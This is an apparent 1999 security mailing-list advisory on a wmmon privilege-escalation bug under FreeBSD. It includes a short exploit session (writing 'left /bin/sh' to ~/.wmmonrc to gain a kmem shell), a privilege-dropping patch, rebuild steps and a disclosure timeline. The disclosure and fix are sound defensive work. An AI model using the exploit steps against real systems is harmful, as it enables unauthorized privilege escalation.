Wmmon under FreeBSD

From: Steve Reid (sreid@SEA-TO-SKY.NET)
Date: Tue Dec 21 1999 - 00:36:44 PST

  • Next message: Richard M. Smith: "The money: protocol in Internet Explorer"

    Wmmon is a popular program for monitoring CPU load and other system
    utilization. It runs as a dockapp under WindowMaker.
    The FreeBSD version of this program has a feature that can be trivially
    exploited to gain group kmem in recent installs, or user root in really
    old installs. This affects the FreeBSD version because under FreeBSD the
    program must be installed setgid kmem or setuid root in order to access
    system load information through the memory devices. The Linux version
    should not be vulnerable because it reads information through procfs
    which requires no special privileges.
    % id
    uid=1000(steve) gid=1000(steve) groups=1000(steve)
    % echo 'left /bin/sh' > ~/.wmmonrc
    % wmmon -display myworkstation.evilhacker.net:0.0
    Monitoring 2 devices for activity.
    {Left-click on the little window that appears}
    current stat is :1
    $ id
    uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve)
    Here is a patch:
    --- work/wmmon.app/wmmon/wmmon.c.old	Thu Dec  2 02:06:55 1999
    +++ work/wmmon.app/wmmon/wmmon.c	Thu Dec  2 04:20:22 1999
    @@ -318,6 +318,8 @@
     	if (kvmd==NULL) kvmd = kvm_openfiles(NULL, NULL, NULL, O_RDONLY, errbuf);
     	if (kvmd==NULL) { fprintf(stderr, "kvm_openfiles: %s\n", errbuf); exit(errno); }
    +	if (setgid(getgid()) != 0) exit(1); /* We're sgid kmem. Give up privs. */
    +	if (setuid(getuid()) != 0) exit(1); /* If we're suid, give that up too. */
     	if (kvmd) {
     		if (kvm_nlist(kvmd, nl) >= 0) {
     			struct nlist *nlp;
    To fix your wmmon binary save the above as wmmon.patch and do this:
    cd /usr/ports/sysutils/wmmon
    make patch
    patch < wmmon.patch
    su root
    make deinstall
    make reinstall
    The exploit and patch were tested with wmmon 1.0.b2 installed using the
    ports tree. Standard disclaimers apply.
    I first emailed the FreeBSD wmmon port maintainer about this back in
    February. At that time the program was installed setuid root, giving
    easy access to user root instead of just group kmem. There was also a
    buffer overflow on the $HOME variable which could probably be used to
    access the memory device file descriptors even if privileges were
    relinquished (which they weren't). The port maintainer acknowledged my
    email and a message warning of a security vulerability was placed in the
    pkg/DESCR file but as far as I could tell that was all that was done for
    some weeks. The port maintainer changed during that time and I guess my
    email got lost in the switch. I forgot about it until a few weeks ago
    when I checked the port again. The warning message is gone, the buffer
    overflow on $HOME is fixed, and the program now installs setgid kmem
    instead of setuid root. The problem still exists, it has just been
    reduced from a root exploit to kmem. On Dec. 2nd I again emailed the
    port maintainer (now a different person) and he acknowledged my email,
    but as of Dec. 20th the port still appears to be vulnerable.

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